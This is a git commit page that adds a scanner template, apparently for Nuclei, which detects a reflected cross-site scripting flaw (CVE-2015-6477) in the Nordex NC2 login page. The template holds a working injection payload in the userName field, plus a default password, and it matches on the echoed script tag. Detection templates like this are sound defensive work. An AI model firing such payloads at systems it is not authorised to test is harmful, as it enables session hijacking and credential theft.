Merge pull request #1895 from geeknik/patch-108

Create CVE-2015-6477.yaml
patch-1
Sandeep Singh 2021-07-07 18:37:48 +05:30 committed by GitHub
commit 5d034716ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2015-6477
info:
name: Nordex NC2 'username' Parameter XSS
description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://seclists.org/fulldisclosure/2015/Dec/117
- https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
- https://nvd.nist.gov/vuln/detail/CVE-2015-6477
author: geeknik
severity: medium
tags: cve,cve2015,xss,iot,nordex,nc2
requests:
- method: POST
path:
- "{{BaseURL}}/login"
body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "</script><script>alert('{{randstr}}')</script>"